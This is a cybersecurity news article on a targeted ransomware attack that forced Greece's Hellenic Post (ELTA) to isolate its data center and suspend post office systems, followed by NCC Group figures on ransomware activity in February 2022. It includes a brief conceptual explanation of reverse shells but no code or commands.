Fraud Management & Cybercrime
Organization’s Data Center Isolated to Contain Targeted Ransomware Attack
The Greek postal service Hellenic Post – or ELTA – has disclosed information on a ransomware incident that forced the organization to pull a majority of its operations offline.
See Also: Live Webinar Tomorrow | Making the Case for Managed Endpoint Detection and Response
The company, in a statement on Monday, said that the suspension was temporary. But the impact appears to be ongoing, based on the organization’s Tuesday statement, which shows that it continues to work toward restoring services.
On Monday, ELTA disclosed that its information systems had been affected by a malware attack on Sunday. Its IT team had limited the attack, ELTA said, adding that an undisclosed cybersecurity vendor was investigating the incident and helping the organization restore services. ELTA said law enforcement authorities had been informed of the incident.
As an immediate precautionary measure, ELTA took its data center offline and isolated it, which resulted in a temporary suspension of all commercial information systems of all post offices throughout the country.
“For reasons of prevention and security, and until all the necessary actions are completed, it was decided to isolate the entire data center of the company. Therefore, we announce the temporary suspension of the commercial information system of all post offices,” ELTA said in its first statement.
On Tuesday, ELTA issued a fresh statement saying that the incident had not been a simple malware attack as initially thought, but a targeted ransomware attack “aimed at encrypting the critical systems” used in its daily operations.
A zero-day vulnerability, the statement said, had been exploited by the undisclosed threat actor(s) to penetrate and deploy malware in ELTA’s network. The initial infection started from a workstation and used the https reverse shell technique to connect to the attacker’s computer system, it said.
Reverse shell is a “virtual” shell that is initiated from a victim’s computer to connect with the attacker’s computer. To gain control of a compromised system, the attacker usually aims to gain interactive shell access for arbitrary command execution. Firewalls protect the victim’s network from incoming connections, so its presence discourages bind shell sessions. Instead of directly requesting a shell session, the attacker waits for a victim’s machine to initiate an outgoing connection – hence, it is called a “reverse” shell.
Since the initial infection started from a workstation on ELTA’s network, the company is examining more than 2,500 computer systems while installing fresh programs into it for security issues, the announcement says. It adds that “the goal is the immediate re-opening of the commercial information system, the security of all data and the faster normalization in the operation of the stores.”
“The stores will not serve the collection of bills, the sending of mail and the financial services,” it says, adding that the distribution of mail and parcels that are already at the mail stations will be conducted without a hitch.
To ensure business continuity, the postal service provider has used ELTA Courier, a premium subsidiary of ELTA, to provide all but financial services. This unit was not affected by the cyberattack.
ELTA Courier confirmed this in a separate announcement. This unit’s costs, however, are three times higher than usual postal services, as it provides premium and quicker services compared to its parent organization, says Facebook user Gianna Kourla in response to ELTA’s social media post. ELTA’s web labeling service appears to have been hit as well, based on Kourla’s statement.
The Hellenic Data Protection Authority did not immediately respond to ISMG’s request for additional details.
February 2022: Increase in Ransomware
Ransomware attacks in February increased 53% month-on-month, cybersecurity consultancy firm NCC Group tells Information Security Media Group.
Industrial (35.68%), consumer cyclicals (21.62%) and technology (8.11%) were the most targeted sectors in the month, while North America (42.16%), Europe (42.16%) and Asia (10.27%) were the most targeted regions, the company’s report, shared with ISMG, shows.
LockBit 2.0, it says, remained the most active threat actor, accounting for 42.2% of all ransomware attacks, with Conti in second position (18%) and BlackCat (11%) in third. NCC predicts that BlackCat will remain among the top three aggressors in March as well.
Matt Hull, cyberthreat intelligence manager at the NCC Group, tells ISMG that with ransomware attacks increasing – as expected after the seasonal reduction in January – it is vital that organizations continue to ensure they apply appropriate security measures.
“This is especially important for the industrials sector, which continues to be the most frequent victim of ransomware,” he says. “It’s interesting to see a regional trend emerging in Europe and North America, with both regions seeing the same number of victims of double-extortion ransomware attacks. By continuing to closely monitor if this pattern persists, we will be able to determine what this means for the wider European threat landscape.”